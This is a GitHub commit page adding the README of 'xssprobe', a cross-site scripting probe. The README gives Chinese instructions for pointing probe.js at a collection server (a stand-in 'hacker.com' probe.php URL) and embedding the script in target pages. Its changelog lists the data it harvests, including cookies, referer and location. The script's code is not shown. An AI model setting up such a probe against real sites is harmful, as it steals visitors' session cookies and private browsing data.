forked from evilcos/xssprobe
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
0 parents
commit 5ef8e9e
Showing
1 changed file
with
20 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
xssprobe | ||
|
||
xss探针脚本,用于获取被跨页面的通用数据。 | ||
|
||
使用说明: | ||
|
||
1、修改probe.js: | ||
// 获取隐私信息的服务端页面,这里需配置为自己的probe.php网址 | ||
http_server = "http://www.hacker.com/xssprobe/probe.php?c="; | ||
2、在目标页面嵌入probe.js文件,可以参考demo.html(xssprobe demo page):) | ||
|
||
|
||
by [email protected] | ||
|
||
ChangeLog | ||
===================================== | ||
|
||
2011/8/22 | ||
v1 能获取的数据如下: | ||
browser, ua, lang, referer, location, toplocation, cookie, domain, title, screen, flash |